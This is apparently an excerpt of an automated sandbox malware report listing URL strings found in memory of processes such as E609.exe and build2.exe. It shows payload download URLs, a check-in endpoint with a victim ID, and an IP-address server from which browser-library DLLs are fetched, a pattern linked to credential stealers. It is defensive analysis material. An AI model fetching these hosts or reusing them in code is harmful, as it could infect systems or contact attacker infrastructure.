            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
            Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe$run(
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe$rund
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0
            Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exe?
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/files/1/build3.exerun
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2086702511.000000000076C000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php
            Source: E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
            Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
            Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueZ
            Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueb
            Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truep
            Source: E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637c
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cajgtus.com/test1/get.phpenh
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
            Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
            Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2734568138.000000000D007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
            Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2734568138.000000000D007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
            Source: explorer.exe, 00000001.00000000.1689675941.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1690859356.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1689226860.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sdfjhuz.com/dl/build2.exe
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sdfjhuz.com/dl/build2.exerun5980
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: E609.exe, 0000000F.00000003.2126285857.0000000009840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: E609.exe, 00000011.00000003.2126495485.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
            Source: E609.exe, 0000000F.00000003.2126555121.0000000009840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
            Source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
            Source: E609.exe, 00000011.00000003.2126716894.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
            Source: E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
            Source: E609.exe, 0000000F.00000003.2126709109.0000000009840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
            Source: build2.exe, 00000013.00000002.2691159740.000000001DDFD000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: E609.exe, 0000000F.00000003.2126992854.0000000009840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: E609.exe, 00000011.00000003.2127708531.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
            Source: E609.exe, 0000000F.00000003.2127702492.0000000009840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
            Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59
            Source: build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2354099315.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/%LB
            Source: build2.exe, 00000013.00000003.2353603355.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342899375.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2341806768.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342259804.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342809334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342138297.00000000008A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/.
            Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/:
            Source: build2.exe, 00000013.00000003.2341998705.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2341806768.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2340668890.00000000008FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/AFHI
            Source: build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/I
            Source: build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/Z
            Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/d
            Source: build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/f
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll/d
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll5d-
            Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dllSd
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373539479.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dllYd
            Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/i
            Source: build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/j
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dll
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/msvcp140.dll
            Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dll
            Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dlla
            Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dllppData
            Source: build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dlly
            Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/pe
            Source: build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/r
            Source: build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/rosoft
            Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/rpriseCertificates
            Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/s
            Source: build2.exe, 00000013.00000003.2500169999.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sf
            Source: build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dll
            Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dll3e
            Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2515338755.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2514930235.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dllqd
            Source: build2.exe, 00000013.00000002.2651384676.000000000052E000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dll
            Source: build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/tography
            Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dll
            Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dll65.109.242.59
            Source: build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dllHp
            Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/ws
            Source: build2.exe, 00000013.00000002.2651384676.0000000000553000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59DHDA
            Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59DHIE
            Source: build2.exe, 00000013.00000003.2318827088.00000000008A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.5P
            Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: explorer.exe, 00000001.00000000.1692249717.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
            Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: E609.exe, 0000000A.00000002.2053964742.000000000059A000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
            Source: E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/Root
            Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/au
